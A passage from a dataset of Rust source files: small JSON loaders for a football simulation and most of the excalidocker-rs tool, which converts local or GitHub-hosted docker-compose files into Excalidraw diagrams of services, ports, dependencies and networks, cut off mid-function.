repo stringlengths 6 65 | file_url stringlengths 81 311 | file_path stringlengths 6 227 | content stringlengths 0 32.8k | language stringclasses 1 value | license stringclasses 7 values | commit_sha stringlengths 40 40 | retrieved_at stringdate 2026-01-04 15:31:58 2026-01-04 20:25:31 | truncated bool 2 classes |
|---|---|---|---|---|---|---|---|---|
ZOXEXIVO/open-football | https://github.com/ZOXEXIVO/open-football/blob/7b55c8c095942c1df498d7aa02b524af6e3a896c/src/database/src/loaders/league.rs | src/database/src/loaders/league.rs | use serde::Deserialize;
const STATIC_LEAGUES_JSON: &str = include_str!("../data/leagues.json");
#[derive(Deserialize)]
pub struct LeagueEntity {
pub id: u32,
pub slug: String,
pub name: String,
pub country_id: u32,
pub settings: LeagueSettingsEntity,
pub reputation: u16,
}
#[derive(Deserialize)]
pub struct LeagueSettingsEntity {
pub season_starting_half: DayMonthPeriodEntity,
pub season_ending_half: DayMonthPeriodEntity,
}
#[derive(Debug, Deserialize)]
pub struct DayMonthPeriodEntity {
pub from_day: u8,
pub from_month: u8,
pub to_day: u8,
pub to_month: u8,
}
pub struct LeagueLoader;
impl LeagueLoader {
pub fn load() -> Vec<LeagueEntity> {
serde_json::from_str(STATIC_LEAGUES_JSON).unwrap()
}
}
| rust | Apache-2.0 | 7b55c8c095942c1df498d7aa02b524af6e3a896c | 2026-01-04T20:24:06.162327Z | false |
ZOXEXIVO/open-football | https://github.com/ZOXEXIVO/open-football/blob/7b55c8c095942c1df498d7aa02b524af6e3a896c/src/database/src/loaders/continent.rs | src/database/src/loaders/continent.rs | use serde::Deserialize;
const STATIC_CONTINENTS_JSON: &str = include_str!("../data/continents.json");
#[derive(Deserialize)]
pub struct ContinentEntity {
pub id: u32,
pub name: String,
}
pub struct ContinentLoader;
impl ContinentLoader {
pub fn load() -> Vec<ContinentEntity> {
serde_json::from_str(STATIC_CONTINENTS_JSON).unwrap()
}
}
| rust | Apache-2.0 | 7b55c8c095942c1df498d7aa02b524af6e3a896c | 2026-01-04T20:24:06.162327Z | false |
etolbakov/excalidocker-rs | https://github.com/etolbakov/excalidocker-rs/blob/1516e3e3bb3edabbfa79b7bacde5488b2dc0a0ef/src/color_utils.rs | src/color_utils.rs | use phf::phf_map;
/// Taken from https://github.com/bahamas10/css-color-names/blob/master/getcolors.sh
pub static COLOR_TO_HEX: phf::Map<&str, &str> = phf_map! {
"aliceblue" => "#f0f8ff",
"antiquewhite" => "#faebd7",
"aqua" => "#00ffff",
"aquamarine" => "#7fffd4",
"azure" => "#f0ffff",
"beige" => "#f5f5dc",
"bisque" => "#ffe4c4",
"black" => "#000000",
"blanchedalmond" => "#ffebcd",
"blue" => "#0000ff",
"blueviolet" => "#8a2be2",
"brown" => "#a52a2a",
"burlywood" => "#deb887",
"cadetblue" => "#5f9ea0",
"chartreuse" => "#7fff00",
"chocolate" => "#d2691e",
"coral" => "#ff7f50",
"cornflowerblue" => "#6495ed",
"cornsilk" => "#fff8dc",
"crimson" => "#dc143c",
"cyan" => "#00ffff",
"darkblue" => "#00008b",
"darkcyan" => "#008b8b",
"darkgoldenrod" => "#b8860b",
"darkgray" => "#a9a9a9",
"darkgreen" => "#006400",
"darkgrey" => "#a9a9a9",
"darkkhaki" => "#bdb76b",
"darkmagenta" => "#8b008b",
"darkolivegreen" => "#556b2f",
"darkorange" => "#ff8c00",
"darkorchid" => "#9932cc",
"darkred" => "#8b0000",
"darksalmon" => "#e9967a",
"darkseagreen" => "#8fbc8f",
"darkslateblue" => "#483d8b",
"darkslategray" => "#2f4f4f",
"darkslategrey" => "#2f4f4f",
"darkturquoise" => "#00ced1",
"darkviolet" => "#9400d3",
"deeppink" => "#ff1493",
"deepskyblue" => "#00bfff",
"dimgray" => "#696969",
"dimgrey" => "#696969",
"dodgerblue" => "#1e90ff",
"firebrick" => "#b22222",
"floralwhite" => "#fffaf0",
"forestgreen" => "#228b22",
"fuchsia" => "#ff00ff",
"gainsboro" => "#dcdcdc",
"ghostwhite" => "#f8f8ff",
"gold" => "#ffd700",
"goldenrod" => "#daa520",
"gray" => "#808080",
"green" => "#008000",
"greenyellow" => "#adff2f",
"grey" => "#808080",
"honeydew" => "#f0fff0",
"hotpink" => "#ff69b4",
"indianred" => "#cd5c5c",
"indigo" => "#4b0082",
"ivory" => "#fffff0",
"khaki" => "#f0e68c",
"lavender" => "#e6e6fa",
"lavenderblush" => "#fff0f5",
"lawngreen" => "#7cfc00",
"lemonchiffon" => "#fffacd",
"lightblue" => "#add8e6",
"lightcoral" => "#f08080",
"lightcyan" => "#e0ffff",
"lightgoldenrodyellow" => "#fafad2",
"lightgray" => "#d3d3d3",
"lightgreen" => "#90ee90",
"lightgrey" => "#d3d3d3",
"lightpink" => "#ffb6c1",
"lightsalmon" => "#ffa07a",
"lightseagreen" => "#20b2aa",
"lightskyblue" => "#87cefa",
"lightslategray" => "#778899",
"lightslategrey" => "#778899",
"lightsteelblue" => "#b0c4de",
"lightyellow" => "#ffffe0",
"lime" => "#00ff00",
"limegreen" => "#32cd32",
"linen" => "#faf0e6",
"magenta" => "#ff00ff",
"maroon" => "#800000",
"mediumaquamarine" => "#66cdaa",
"mediumblue" => "#0000cd",
"mediumorchid" => "#ba55d3",
"mediumpurple" => "#9370db",
"mediumseagreen" => "#3cb371",
"mediumslateblue" => "#7b68ee",
"mediumspringgreen" => "#00fa9a",
"mediumturquoise" => "#48d1cc",
"mediumvioletred" => "#c71585",
"midnightblue" => "#191970",
"mintcream" => "#f5fffa",
"mistyrose" => "#ffe4e1",
"moccasin" => "#ffe4b5",
"navajowhite" => "#ffdead",
"navy" => "#000080",
"oldlace" => "#fdf5e6",
"olive" => "#808000",
"olivedrab" => "#6b8e23",
"orange" => "#ffa500",
"orangered" => "#ff4500",
"orchid" => "#da70d6",
"palegoldenrod" => "#eee8aa",
"palegreen" => "#98fb98",
"paleturquoise" => "#afeeee",
"palevioletred" => "#db7093",
"papayawhip" => "#ffefd5",
"peachpuff" => "#ffdab9",
"peru" => "#cd853f",
"pink" => "#ffc0cb",
"plum" => "#dda0dd",
"powderblue" => "#b0e0e6",
"purple" => "#800080",
"rebeccapurple" => "#663399",
"red" => "#ff0000",
"rosybrown" => "#bc8f8f",
"royalblue" => "#4169e1",
"saddlebrown" => "#8b4513",
"salmon" => "#fa8072",
"sandybrown" => "#f4a460",
"seagreen" => "#2e8b57",
"seashell" => "#fff5ee",
"sienna" => "#a0522d",
"silver" => "#c0c0c0",
"skyblue" => "#87ceeb",
"slateblue" => "#6a5acd",
"slategray" => "#708090",
"slategrey" => "#708090",
"snow" => "#fffafa",
"springgreen" => "#00ff7f",
"steelblue" => "#4682b4",
"tan" => "#d2b48c",
"teal" => "#008080",
"thistle" => "#d8bfd8",
"tomato" => "#ff6347",
"turquoise" => "#40e0d0",
"violet" => "#ee82ee",
"wheat" => "#f5deb3",
"white" => "#ffffff",
"whitesmoke" => "#f5f5f5",
"yellow" => "#ffff00",
"yellowgreen" => "#9acd32",
};
| rust | MIT | 1516e3e3bb3edabbfa79b7bacde5488b2dc0a0ef | 2026-01-04T20:25:32.074311Z | false |
etolbakov/excalidocker-rs | https://github.com/etolbakov/excalidocker-rs/blob/1516e3e3bb3edabbfa79b7bacde5488b2dc0a0ef/src/error.rs | src/error.rs | use thiserror::Error;
#[derive(Error, Debug)]
pub enum ExcalidockerError {
#[error(
"File '{}' has unsupported extension. File should be 'yaml' or 'yml'",
path
)]
FileIncorrectExtension { path: String },
#[error("Failed to open '{}'. Details: {}", path, msg)]
FileNotFound { path: String, msg: String },
#[error("Failed to download '{}'. Details: {}", path, msg)]
RemoteFileFailedRead { path: String, msg: String },
#[error("Failed to parse provided docker-compose '{}'. Details: {}", path, msg)]
InvalidDockerCompose { path: String, msg: String },
}
| rust | MIT | 1516e3e3bb3edabbfa79b7bacde5488b2dc0a0ef | 2026-01-04T20:25:32.074311Z | false |
etolbakov/excalidocker-rs | https://github.com/etolbakov/excalidocker-rs/blob/1516e3e3bb3edabbfa79b7bacde5488b2dc0a0ef/src/file_utils.rs | src/file_utils.rs | use std::io::Read;
use std::{fs::File, process::exit};
use isahc::ReadResponseExt;
use serde_yaml::{Mapping, Value};
use crate::exporters::excalidraw_config::DEFAULT_CONFIG;
use crate::{
error::ExcalidockerError::{self, FileIncorrectExtension, FileNotFound, RemoteFileFailedRead},
exporters::excalidraw_config::ExcalidrawConfig,
};
pub fn get_excalidraw_config(file_path: &str) -> ExcalidrawConfig {
let excalidocker_config_contents = match read_yaml_file(file_path) {
Ok(contents) => contents,
Err(_) => {
// if we could not find the provided config
// and there is no default config at the default path
// we use the hardcoded `DEFAULT_CONFIG` itself
DEFAULT_CONFIG.to_string()
}
};
match serde_yaml::from_str(&excalidocker_config_contents) {
Ok(cfg) => cfg,
Err(err) => {
println!("Configuration parsing issue: {}", err);
exit(1);
}
}
}
pub fn get_docker_compose_content(file_path: &str) -> Mapping {
let file_content = match get_file_content(file_path) {
Ok(content) => content,
Err(err) => {
println!("{}", err);
return Mapping::new();
}
};
return match serde_yaml::from_str::<Value>(&file_content) {
Ok(mut yaml_content) => {
let _ = yaml_content.apply_merge(); // TODO potentially here we know which files are using anchors
yaml_content
.as_mapping()
.unwrap_or(&Mapping::new())
.to_owned()
}
Err(err) => {
println!("{}", err);
return Mapping::new();
}
};
}
/// Read yaml file content into a String
fn read_yaml_file(file_path: &str) -> Result<String, ExcalidockerError> {
if !(file_path.ends_with(".yaml") || file_path.ends_with(".yml")) {
return Err(FileIncorrectExtension {
path: file_path.to_string(),
});
}
let mut file = match File::open(file_path) {
Ok(file) => file,
Err(err) => {
return Err(FileNotFound {
path: file_path.to_string(),
msg: err.to_string(),
})
}
};
let mut contents = String::new();
match file.read_to_string(&mut contents) {
Ok(_) => Ok(contents),
Err(err) => Err(FileNotFound {
path: file_path.to_string(),
msg: err.to_string(),
}),
}
}
/// Get file content as a String.
/// Both remote (f.e. from Github) and local files are supported
fn get_file_content(file_path: &str) -> Result<String, ExcalidockerError> {
if file_path.starts_with("http") {
let url = rewrite_github_url(file_path);
let mut response = match isahc::get(url) {
Ok(rs) => rs,
Err(err) => {
return Err(RemoteFileFailedRead {
path: file_path.to_string(),
msg: err.to_string(),
})
}
};
match response.text() {
Ok(data) => Ok(data),
Err(err) => Err(RemoteFileFailedRead {
path: file_path.to_string(),
msg: err.to_string(),
}),
}
} else {
read_yaml_file(file_path)
}
}
/// When a Github website link provided instead of a link to a raw file
/// this method rewrites the url thus it's possible to get the referenced file content.
fn rewrite_github_url(input: &str) -> String {
if input.contains("github.com") {
input
.replace("https://github.com/", "https://raw.githubusercontent.com/")
.replace("/blob/", "/")
} else {
input.to_owned()
}
}
#[test]
fn test_rewrite_github_url() {
let input1 = "https://github.com/etolbakov/excalidocker-rs/blob/main/data/compose/docker-compose-very-large.yaml";
assert_eq!(
"https://raw.githubusercontent.com/etolbakov/excalidocker-rs/main/data/compose/docker-compose-very-large.yaml",
rewrite_github_url(input1)
);
let input2 =
"https://github.com/treeverse/lakeFS/blob/master/deployments/compose/docker-compose.yml";
assert_eq!(
"https://raw.githubusercontent.com/treeverse/lakeFS/master/deployments/compose/docker-compose.yml",
rewrite_github_url(input2)
);
let input3 = "https://github.com/etolbakov/excalidocker-rs/blob/feat/edge-type-support/data/compose/docker-compose-very-large.yaml";
assert_eq!(
"https://raw.githubusercontent.com/etolbakov/excalidocker-rs/feat/edge-type-support/data/compose/docker-compose-very-large.yaml",
rewrite_github_url(input3)
);
let input4 = "https://raw.githubusercontent.com/etolbakov/excalidocker-rs/blob/edge-type-support/data/compose/docker-compose-very-large.yaml";
assert_eq!(
"https://raw.githubusercontent.com/etolbakov/excalidocker-rs/blob/edge-type-support/data/compose/docker-compose-very-large.yaml",
rewrite_github_url(input4)
);
}
| rust | MIT | 1516e3e3bb3edabbfa79b7bacde5488b2dc0a0ef | 2026-01-04T20:25:32.074311Z | false |
etolbakov/excalidocker-rs | https://github.com/etolbakov/excalidocker-rs/blob/1516e3e3bb3edabbfa79b7bacde5488b2dc0a0ef/src/main.rs | src/main.rs | mod color_utils;
mod error;
mod exporters;
mod file_utils;
use clap::{arg, command, Parser};
use exporters::excalidraw::elements::{
FONT_SIZE_EXTRA_LARGE, FONT_SIZE_LARGE, FONT_SIZE_MEDIUM, FONT_SIZE_SMALL,
};
use exporters::excalidraw_config::{
arrow_bounded_element, binding, BoundElement, DEFAULT_CONFIG_PATH,
};
use exporters::excalidraw_config::{margins, ExcalidrawConfig};
use indexmap::IndexMap;
use rand::{distributions::Alphanumeric, Rng};
use std::collections::{HashMap, HashSet};
use std::fs;
use std::vec;
use exporters::excalidraw::{Element, ExcalidrawFile};
use serde::{Deserialize, Serialize};
use serde_yaml::Value;
use crate::error::ExcalidockerError::InvalidDockerCompose;
use crate::exporters::excalidraw::elements;
#[derive(Parser)]
#[command(name = clap::crate_name!())]
#[command(author = clap::crate_authors!())]
#[command(version = clap::crate_version!())]
#[command(about = clap::crate_description!(), long_about = None)]
#[command(override_usage(format!(
"
{} {}
╰→ excalidocker --input-path <INPUT_PATH>
╰→ excalidocker --show-config",
clap::crate_name!(),
clap::crate_version!())
))]
struct Cli {
/// show configuration file
#[arg(short = 'C', long, default_value_t = false)]
show_config: bool,
/// file path to the docker-compose.yaml
#[arg(short, long, required_unless_present = "show_config")]
input_path: Option<String>,
/// display connecting lines between services; if `true` then only service without the lines are rendered
#[arg(short, long, default_value_t = false)]
skip_dependencies: bool,
/// display network(s); if `true` then network are not rendered
#[arg(short = 'N', long, default_value_t = false)]
skip_network: bool,
/// file path for the output excalidraw file.
/// By default the file content is sent to console output
#[arg(short, long)]
output_path: Option<String>,
/// config file path for the excalidraw.
#[arg(short, long, default_value_t = DEFAULT_CONFIG_PATH.to_string())]
config_path: String,
}
#[derive(Debug, Clone)]
struct ContainerPoint(String, i32, i32);
impl ContainerPoint {
fn new(name: String, x: i32, y: i32) -> Self {
Self(name, x, y)
}
// fn set_name(mut self, name: String) -> Self {
// self.0 = name;
// self
// }
}
#[derive(Debug, Clone)]
struct DependencyComponent {
id: String,
name: String,
parent: Vec<DependencyComponent>,
}
impl DependencyComponent {
fn new(id: String, name: String, parent: Vec<DependencyComponent>) -> Self {
Self { id, name, parent }
}
}
fn traverse_in_hierarchy(
name: &str,
dependencies: &IndexMap<&str, DependencyComponent>,
containers_traversal_order: &mut Vec<String>,
visited: &mut HashSet<String>,
) {
if let Some(children) = dependencies.get(name) {
for child in &children.parent {
if !visited.contains(&child.name) {
traverse_in_hierarchy(
&child.name,
dependencies,
containers_traversal_order,
visited,
);
}
}
}
if !visited.contains(name) {
containers_traversal_order.push(name.to_string());
visited.insert(name.to_string());
}
}
// fn build_hierarchy(containers: &HashMap<String, Container>) -> HashMap<String, Vec<String>> {
// let mut dependencies: HashMap<String, Vec<String>> = HashMap::new();
// for (name, container) in containers {
// for dependency in &container.depends_on {
// dependencies
// .entry(dependency.clone())
// .or_insert_with(Vec::new)
// .push(name.clone());
// }
// }
/// This struct is introduced to hold intermediate state of the rectange
/// Due to the implementation logic the rectangle initialization (`x`, `y`, `width`, `height`)
/// is happening in the beginning of the program while `group_ids` and `bound_elements`
/// could be added/updated later.
#[derive(Debug, Clone)]
struct RectangleStruct {
pub id: String,
pub container_name: String,
pub x: i32,
pub y: i32,
pub width: i32,
pub height: i32,
pub group_ids: Vec<String>,
pub text_group_ids: Vec<String>,
pub bound_elements: Vec<BoundElement>,
}
fn main() {
let cli = Cli::parse();
let excalidraw_config: ExcalidrawConfig =
file_utils::get_excalidraw_config(cli.config_path.as_str());
if cli.show_config {
println!("{}", serde_yaml::to_string(&excalidraw_config).unwrap());
return;
}
let mut excalidraw_file = ExcalidrawFile::default();
let scale = excalidraw_file.app_state.grid_size;
let mut x = 0;
let mut y = 0;
let width = 140;
let height = 60;
let port_diameter = 60;
let mut container_name_rectangle_structs = HashMap::new();
let mut container_name_to_point = HashMap::new();
let mut container_name_to_parents: IndexMap<&str, DependencyComponent> = IndexMap::new();
let mut container_name_to_container_struct = HashMap::new();
let input_path = &cli.input_path.unwrap();
let input_filepath = input_path.as_str();
let docker_compose_yaml = file_utils::get_docker_compose_content(input_filepath);
let alignment_mode = excalidraw_config.alignment.mode.as_str();
let (x_margin, y_margin, x_alignment_factor, y_alignment_factor) = margins(alignment_mode);
let services = match docker_compose_yaml.get("services") {
Some(services) => services,
None => {
println!(
"{}",
InvalidDockerCompose {
path: input_filepath.to_string(),
msg: "Failed to get 'services' attribute".to_string()
}
);
return;
}
};
let networks = docker_compose_yaml
.get("networks")
.and_then(DockerContainer::parse_networks);
let mut identifier: i32 = 1;
for (container_name_val, container_data_val) in services.as_mapping().unwrap() {
let container_id = format!("container_{}", identifier);
let container_struct =
DockerContainer::convert_to_container(container_id.clone(), container_data_val);
let container_name_str = container_name_val.as_str().unwrap();
let dependency_component = create_dependency_component(
container_id,
container_name_str.to_string(),
&container_struct.depends_on,
);
container_name_to_parents.insert(container_name_str, dependency_component);
container_name_to_container_struct.insert(container_name_str, container_struct);
identifier += 1;
}
let containers_traversal_order =
find_containers_traversal_order(container_name_to_parents.clone());
for cn_name in containers_traversal_order {
let container_width =
width + find_additional_width(cn_name.as_str(), &scale, &excalidraw_config.font.size);
let container_struct = container_name_to_container_struct
.get(cn_name.as_str())
.unwrap();
container_name_to_point.insert(cn_name.clone(), ContainerPoint::new(cn_name.clone(), x, y));
// ------------ Define container ------------
let container_group = vec![format!("container_group_{}", generate_id())];
let mut rectangle_struct = RectangleStruct {
id: container_struct.id.clone(),
container_name: cn_name.clone(),
x,
y,
width: container_width,
height,
group_ids: container_group.clone(),
text_group_ids: container_group.clone(),
bound_elements: vec![],
};
// ------------ Define ports ------------
let ports = container_struct.clone().ports.unwrap_or(Vec::new());
for (i, port) in ports.iter().enumerate() {
let i = i as i32;
let (container_adjustment_x, container_adjustment_y) =
get_container_xy(alignment_mode, &container_width, &scale, i);
let container_x = x + container_adjustment_x;
let container_y = y + container_adjustment_y;
let (host_port_str, container_port_str) = extract_host_container_ports(port);
let ellipse_port_group = vec![format!("group_{}_hostport_{}_text", cn_name, i)];
let ellipse_host_port_id = format!("ellipse_{}", generate_id());
let host_port_arrow_id = format!("port_arrow_{}", generate_id());
let host_port = Element::draw_ellipse(
ellipse_host_port_id.clone(),
container_x,
container_y,
port_diameter,
port_diameter,
ellipse_port_group.clone(),
vec![arrow_bounded_element(host_port_arrow_id.clone())],
excalidraw_config.ports.background_color.clone(),
excalidraw_config.ports.fill.clone(),
);
let host_port_text = Element::draw_small_monospaced_text(
host_port_str.clone(),
container_x + 15,
container_y + 20,
ellipse_port_group.clone(),
excalidraw_config.font.size,
excalidraw_config.font.family,
);
let (host_port_arrow_x, host_port_arrow_y) =
get_host_port_arrow_xy(alignment_mode, &height, &width, &container_width);
let host_port_arrow = Element::simple_arrow(
host_port_arrow_id.clone(),
x + host_port_arrow_x,
y + host_port_arrow_y,
200,
100,
elements::STROKE_STYLE.into(),
"sharp".to_string(),
get_host_port_arrow_points(alignment_mode, i),
binding(container_struct.id.clone()),
binding(ellipse_host_port_id),
);
// bind the port arrow to the container
rectangle_struct
.bound_elements
.push(arrow_bounded_element(host_port_arrow_id.to_string()));
if host_port_str != container_port_str {
let (container_port_text_x, container_port_text_y) =
get_container_port_text_xy(alignment_mode, &height, &width, i);
let container_port_text = Element::draw_small_monospaced_text(
container_port_str,
x + container_port_text_x,
y + container_port_text_y,
container_group.clone(),
excalidraw_config.font.size,
excalidraw_config.font.family,
);
excalidraw_file.elements.push(container_port_text);
}
excalidraw_file.elements.push(host_port);
excalidraw_file.elements.push(host_port_text);
excalidraw_file.elements.push(host_port_arrow);
}
// ------------ Define alignment ------------
let (x_alignment, y_alignment) = get_alignment_factor_xy(
alignment_mode,
x_alignment_factor,
y_alignment_factor,
container_width,
scale,
);
x += x_margin + x_alignment;
y += y_margin + y_alignment;
container_name_rectangle_structs.insert(cn_name, rectangle_struct);
}
// ------------ Define network ------------
let containers_in_network = if cli.skip_network || !excalidraw_config.network.visible {
vec![]
} else {
find_containers_in_network(
container_name_to_parents.clone(),
networks,
container_name_to_container_struct.clone(),
)
};
for (network_name, first_container_name, last_container_name) in containers_in_network {
let first_container_struct = container_name_rectangle_structs
.get(first_container_name.as_str())
.unwrap();
let last_container_struct = container_name_rectangle_structs
.get(last_container_name.as_str())
.unwrap();
let (
network_rectangle_x,
network_rectangle_y,
network_rectangle_width,
network_rectangle_height,
) = get_network_rectangle_xy_width_height(
alignment_mode,
first_container_struct,
last_container_struct,
x_margin,
y_margin,
);
let (network_text_x, network_text_y) = get_network_text_xy(
alignment_mode,
first_container_struct,
last_container_struct,
x_margin,
y_margin,
);
let network_rectangle = Element::simple_rectangle(
format!("network_rectangle_{network_name}"),
network_rectangle_x,
network_rectangle_y,
network_rectangle_width,
network_rectangle_height,
Vec::new(),
Vec::new(),
elements::NETWORK_COLOR.into(),
excalidraw_config.services.fill.clone(),
elements::CONNECTION_STYLE.into(),
excalidraw_config.services.edge.clone(),
);
let network_text = Element::draw_small_monospaced_text(
network_name,
network_text_x,
network_text_y,
Vec::new(),
excalidraw_config.font.size,
excalidraw_config.font.family,
);
excalidraw_file.elements.push(network_rectangle);
excalidraw_file.elements.push(network_text);
}
for (
container_name,
DependencyComponent {
id,
name: _,
parent,
},
) in &container_name_to_parents
{
let ContainerPoint(_, x, y) = container_name_to_point.get(*container_name).unwrap();
// any of those two conditions (cli argument or configuration setting) can switch off the connections
let sorted_container_points =
if cli.skip_dependencies || !excalidraw_config.connections.visible {
Vec::<ContainerPoint>::new()
} else {
let mut points = parent
.iter()
.map(|dc| {
let cp = container_name_to_point.get(&dc.name).unwrap();
ContainerPoint::new(dc.name.clone(), cp.1, cp.2)
})
.collect::<Vec<ContainerPoint>>();
points.sort_by(|cp1, cp2| cp2.1.cmp(&cp1.1));
points
};
for (i, parent_point) in sorted_container_points.iter().enumerate() {
let i = i as i32;
let parent_name = &parent_point.0;
let parent_temp_struct = container_name_rectangle_structs
.get_mut(parent_name)
.unwrap();
let x_parent = &parent_point.1;
let y_parent = &parent_point.2;
let level_height = y_parent - y;
let interation_x_margin = (i + 1) * scale;
let connecting_arrow_points = get_connecting_arrow_points(
alignment_mode,
x,
y,
x_parent,
y_parent,
&height,
&width,
&interation_x_margin,
&scale,
level_height,
i,
);
let connecting_arrow_id = format!("connecting_arrow_{}", generate_id());
let (connecting_arrow_x, connecting_arrow_y) =
get_connecting_arrow_xy(alignment_mode, interation_x_margin);
let connecting_arrow = Element::simple_arrow(
connecting_arrow_id.clone(),
x + connecting_arrow_x,
y + connecting_arrow_y,
0,
y_margin,
elements::CONNECTION_STYLE.into(),
excalidraw_config.connections.edge.clone(),
connecting_arrow_points,
binding(id.to_string()), // child container
binding(parent_temp_struct.id.clone()), // parent container
);
// for dependency connection we need to add:
// - child container id to the binding
// - parent container id to the binding
// - boundElements for the child container (id of the connecting_arrow)
// - boundElements for the parent container (id of the connecting_arrow)
let connecting_arrow_bound = arrow_bounded_element(connecting_arrow_id);
parent_temp_struct
.bound_elements
.push(connecting_arrow_bound.clone());
let current_temp_struct = container_name_rectangle_structs
.get_mut(*container_name)
.unwrap();
current_temp_struct
.bound_elements
.push(connecting_arrow_bound);
excalidraw_file.elements.push(connecting_arrow);
}
}
container_name_rectangle_structs.values().for_each(|rect| {
let container_rectangle = Element::simple_rectangle(
rect.id.clone(),
rect.x,
rect.y,
rect.width,
rect.height,
rect.group_ids.clone(),
rect.bound_elements.clone(),
excalidraw_config.services.background_color.clone(),
excalidraw_config.services.fill.clone(),
elements::STROKE_STYLE.into(),
excalidraw_config.services.edge.clone(),
);
let container_text = Element::draw_small_monospaced_text(
rect.container_name.clone(),
rect.x + scale,
rect.y + scale,
rect.text_group_ids.clone(),
excalidraw_config.font.size,
excalidraw_config.font.family,
);
excalidraw_file.elements.push(container_rectangle);
excalidraw_file.elements.push(container_text);
});
let excalidraw_data = serde_json::to_string(&excalidraw_file).unwrap();
match cli.output_path {
Some(output_file_path) => {
fs::write(output_file_path.clone(), excalidraw_data).expect("Unable to write file");
println!("\nConfiguration file : '{}'", cli.config_path.as_str());
println!("\nInput file : '{}'", input_filepath);
println!(
"\nExcalidraw file is successfully generated and can be found at '{}'\n",
output_file_path
);
}
None => println!("{}", excalidraw_data),
}
}
fn create_dependency_component(
id: String,
container_name: String,
depends_on: &Option<Vec<String>>,
) -> DependencyComponent {
match depends_on {
Some(deps) => DependencyComponent::new(
id,
container_name,
deps.iter()
.map(|name| DependencyComponent::new("".to_string(), name.to_string(), Vec::new()))
.collect::<Vec<DependencyComponent>>(),
),
None => DependencyComponent::new(id, container_name, Vec::new()),
}
}
fn get_connecting_arrow_xy(alignment_mode: &str, interation_margin: i32) -> (i32, i32) {
if alignment_mode == "vertical" {
(0, interation_margin / 2)
} else {
(interation_margin, 0)
}
}
#[allow(clippy::too_many_arguments)]
fn get_connecting_arrow_points(
alignment_mode: &str,
x: &i32,
y: &i32,
x_parent: &i32,
y_parent: &i32,
height: &i32,
width: &i32,
interation_x_margin: &i32,
scale: &i32,
level_height: i32,
i: i32,
) -> Vec<[i32; 2]> {
if alignment_mode == "vertical" {
vec![
[0, 0],
[-2 * (i + 1) * scale, 0],
[
-2 * (i + 1) * scale,
// level_height
level_height + scale,
],
[
-1,
// level_height
level_height + scale,
],
]
} else {
vec![
[0, 0],
[0, level_height - height],
[
-x + x_parent + width - interation_x_margin * 2,
level_height - height,
],
[
-x + x_parent + width - interation_x_margin * 2,
y_parent - y,
],
]
}
}
fn get_alignment_factor_xy(
alignment_mode: &str,
x_alignment_factor: i32,
y_alignment_factor: i32,
container_width: i32,
scale: i32,
) -> (i32, i32) {
(
x_alignment_factor * container_width,
if alignment_mode == "vertical" {
y_alignment_factor * 2 * scale // TODO should we increase the step or make it configurable??
} else {
y_alignment_factor * scale
},
)
}
fn get_container_port_text_xy(
alignment_mode: &str,
height: &i32,
width: &i32,
i: i32,
) -> (i32, i32) {
if alignment_mode == "vertical" {
(width + 20, height / 2 + (i * 40) - 35)
} else {
(20 + i * 80, 80)
}
}
fn get_host_port_arrow_points(alignment_mode: &str, i: i32) -> Vec<[i32; 2]> {
if alignment_mode == "vertical" {
vec![[0, 0], [i + 100, i * 80 - 35]]
} else {
vec![[0, 0], [i * 80 - 35, i + 100]]
}
}
fn get_host_port_arrow_xy(
alignment_mode: &str,
height: &i32,
width: &i32,
container_width: &i32,
) -> (i32, i32) {
if alignment_mode == "vertical" {
(*container_width, height / 2)
} else {
(width / 2, *height)
}
}
fn get_container_xy(alignment_mode: &str, width: &i32, scale: &i32, i: i32) -> (i32, i32) {
if alignment_mode == "vertical" {
(*width + scale * 5, i * 80 - 35)
} else {
(i * 80, scale * 8)
}
}
fn get_network_rectangle_xy_width_height(
alignment_mode: &str,
first_container_struct: &RectangleStruct,
last_container_struct: &RectangleStruct,
x_margin: i32,
y_margin: i32,
) -> (i32, i32, i32, i32) {
let first_x = first_container_struct.x;
let first_y = first_container_struct.y;
let last_x = last_container_struct.x;
let last_y = last_container_struct.y;
let last_width = last_container_struct.width;
let last_height = last_container_struct.height;
match alignment_mode {
"stepped" => (
first_x - x_margin / 2,
first_y - y_margin / 2,
(last_x - first_x) + last_width + x_margin,
(last_y - first_y) + last_height + y_margin,
),
"vertical" => (
first_x - x_margin / 4 - 40,
first_y - y_margin / 4,
(last_x - first_x + 2 * 40) + last_width + x_margin,
(last_y - first_y) + last_height + y_margin / 2,
),
"horizontal" => (
first_x - x_margin / 2,
first_y - y_margin / 2 - 40,
(last_x - first_x) + last_width + x_margin,
(last_y - first_y + 2 * 40) + last_height + y_margin,
),
_ => (0_i32, 0_i32, 0_i32, 0_i32),
}
}
fn get_network_text_xy(
alignment_mode: &str,
first_container_struct: &RectangleStruct,
last_container_struct: &RectangleStruct,
x_margin: i32,
y_margin: i32,
) -> (i32, i32) {
let first_x = first_container_struct.x;
let first_y = first_container_struct.y;
let last_y = last_container_struct.y;
let last_height = last_container_struct.height;
match alignment_mode {
"stepped" => (first_x - x_margin / 2, last_y - last_height - y_margin),
"vertical" => (first_x + x_margin - 6 * 20, first_y),
"horizontal" => (first_x - x_margin / 2, last_y - last_height - y_margin),
_ => (0_i32, 0_i32),
}
}
/// There are several ways to declare ports:
/// - "0" single port value(range of values): a container port(range) will be assigned to random host port(range)
/// - "1" colon separated values (range of values): container port (range) is assigned to given host port (range)
/// - "_" detailed declaration which may include `host_ip`, `protocol` etc
fn extract_host_container_ports(port: &str) -> (String, String) {
let port_parts: Vec<_> = port.rmatch_indices(':').collect();
let port_string = port.to_string();
match port_parts.len() {
0 => (port_string.clone(), port_string),
1 => {
let split = port.split(':').collect::<Vec<&str>>();
(split[0].to_string(), split[1].to_string())
}
_ => {
let colon_index = port_parts.first().unwrap().0;
(
port_string.chars().take(colon_index).collect(),
port_string.chars().skip(colon_index + 1).collect(),
)
}
}
}
fn find_containers_traversal_order(
container_name_to_parents: IndexMap<&str, DependencyComponent>,
) -> Vec<String> {
let mut containers_traversal_order: Vec<String> = Vec::new();
let mut visited: HashSet<String> = HashSet::new();
for name in container_name_to_parents.keys() {
traverse_in_hierarchy(
name,
&container_name_to_parents,
&mut containers_traversal_order,
&mut visited,
);
}
containers_traversal_order
}
fn find_containers_in_network(
container_name_to_parents: IndexMap<&str, DependencyComponent>,
networks: Option<Vec<String>>,
container_name_to_container_struct: HashMap<&str, DockerContainer>,
) -> Vec<(String, String, String)> {
let traversal_order = find_containers_traversal_order(container_name_to_parents.clone());
match networks {
Some(networks) => match networks.len() {
0 => vec![],
1 => vec![(
networks.first().unwrap().to_string(),
traversal_order.first().unwrap().to_string(),
traversal_order.last().unwrap().to_string(),
)],
_ => {
